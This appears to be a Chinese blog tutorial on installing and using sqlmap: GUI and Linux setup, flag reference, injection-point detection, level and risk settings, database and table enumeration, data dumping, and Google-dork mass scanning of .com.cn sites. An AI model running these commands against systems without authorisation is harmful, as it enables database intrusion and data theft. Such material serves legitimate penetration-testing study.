sqlmap使用以及GUI安装

下载

GUI版地址: GitHub - honmashironeko/sqlmap-gui: 基于官版本 SQLMAP 进行人工汉化,并提供GUI界面及多个自动化脚本

GUI使用

可以点击.bat启动

如果点击.bat启动不了就在这里打开cmd,输入对应的.bat来启动

linux安装

地址:sqlmap: automatic SQL injection and database takeover tool

选择.tar.gz文件

解压:tar -zxvf sqlmapproject-sqlmap-1.8.6-5-g6ae0d0f.tar.gz

取别名:alias sqlmap='/home/kali/sqlmap/sqlmapproject-sqlmap-6ae0d0f/sqlmap.py'

命令行使用

复制代码
-u  指定URL-p  指定参数-v  指定显示级别--dbs  目标服务器中的数据库--current-db  当前数据库--tables  目标数据库有什么表--columns  目标表中有什么列--dump  获取数据--batch  跳过问询(yes)之间执行,批处理,在检测过程中会问用户一些问题,使用这个参数统统使用默认值--dbms  指定数据库类型--current-user  查看当前用户--users  查看所有用户--passwords  数据库密码--hostname  系统名称--banner  数据库信息--roles  数据库用户角色
判断注入点
复制代码
# get方法
sqlmap -u "目标url+get参数"
# post方法
1.sqlmap -r 流量包文件.txt
2.sglmap -u "url" --data "post数据"
# 带cookie
sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=ncoe0kgvdnq1l6755" --batch
# 设置等级
sqlmap -u "http://xxx:7777/Less-1/" --level=5 --risk=3


level 和 risk

在 SQLmap 中,level和risk是两个重要的选项,用于指定 SQL 注入检测和利用的深度和风险程度。
level选项用于指定检测的深度,取值范围为 1~5,数字越大,检测的深度越深,检测的速度越慢。
默认值为 1,表示最浅层的检测。risk选项用于指定检测和利用的风险程度,
取值范围为 0~3,数字越大,风险越高,检测和利用的方式越激进。默认值为 1,表示中等的风险程度。
在使用 SQLmap 时,根据实际情况选择合适的level和risk选项,可以提高检测和利用的效率和成功率,
同时避免对目标系统造成过多的影响和损害。

需要注意的是,level和risk选项虽然可以提高检测和利用的效率和成功率,但也会增加误报和误判的风险,
甚至可能引发系统崩溃和数据损坏等问题。因此,在使用这两个选项时,需要谨慎评估风险和影响,
并进行充分的测试和验证。同时,还需要遵守合法、合规、道德的原则,遵守法律法规,
并获得相关授权和许可,以避免违法和不当行为带来的法律和道德风险。

Sqlmap 一共有 5 个探测等级,默认是 1。等级越高,说明探测时使用的 payload 也越多。
其中 5 级的 payload 最多,会自动破解出 cookie、XFF 等头部注入。当然,等级越高,
探测的时间也越慢。这个参数会影响测试的注入点,GET 和 POST 的数据都会进行测试,
HTTP cookie在 level 为 2 时就会测试,HTTP User-Agent/Referer头在 level 为 3 时就会测试。
在不确定哪个参数为注入点时,为了保证准确性,建议设置 level 为5

sqlmap 一共有 3 个危险等级,也就是说你认为这个网站存在几级的危险等级。
和探测等级一个意思,在不确定的情况下,建议设置为 3 级
获取内容
复制代码
# 获取数据库名
sqlmap -u 目标url+参数 --dbs
# 获取表名
sqlmap -u 目标 -D 库名 --tables
# 获取字段名
sqlmap -u 目标 -D 库名 -T 表名 --columns
# 获取字段值
sqlmap -u 目标 -D 库名 -T 表名 --dump #获取全部
sqlmap -u 目标 -D 库名 -T 表名 -C "字段1,字段2,.." --dump #获取指定
文件读取
复制代码
Sqlmap支持从不同类型的文件中读取目标进行Sql注入探测

-l从Burpsuite proxy或WebScarab proxy中读取Http请求日志文件

-×从sitemap.xml站点地图文件中读取目标探测。

-m从多行文本格式文件读取多个目标,对多个目标进行探测。

-r从文本文件中读取Http请求作为Sql注入探测的目标。

-c从配置文件sqlmap.conf中读取目标探测。
对google进行扫描
复制代码
Sqlmap通过-g自动利用Google获取指定Google hack的目杯,然后利用交互问导模式进行Sql注入探测。
例如:
python sqlmap.py -g "inurl:.php?id=1"
python sqlmap.py -g "inurl:php?id=10 site:.com.cn" --proxy"http://127.0.0.1:1080" --threads 5 --batch --answer "extending=N,follow=N,keep=N,exploit=n" --smart
相关推荐
枷锁—sha1 小时前
Burp Suite 抓包全流程与 Xray 联动自动挖洞指南
网络·安全·网络安全
聚铭网络1 小时前
聚铭网络再度入选2026年度扬州市网络和数据安全服务资源池单位
网络安全
darkb1rd4 小时前
八、PHP SAPI与运行环境差异
开发语言·网络安全·php·webshell
世界尽头与你8 小时前
(修复方案)基础目录枚举漏洞
安全·网络安全·渗透测试
枷锁—sha1 天前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
liann1191 天前
3.1_网络——基础
网络·安全·web安全·http·网络安全
ESBK20251 天前
第四届移动互联网、云计算与信息安全国际会议(MICCIS 2026)二轮征稿启动,诚邀全球学者共赴学术盛宴
大数据·网络·物联网·网络安全·云计算·密码学·信息与通信
旺仔Sec1 天前
一文带你看懂免费开源 WAF 天花板!雷池 (SafeLine) 部署与实战全解析
web安全·网络安全·开源·waf
七牛云行业应用1 天前
Moltbook一夜崩盘:150万密钥泄露背后的架构“死穴”与重构实战
网络安全·postgresql·架构·高并发·七牛云
原来是你~呀~1 天前
Strix:AI驱动的全自动安全测试平台,LinuxOS部署
网络安全·自动化渗透测试·strix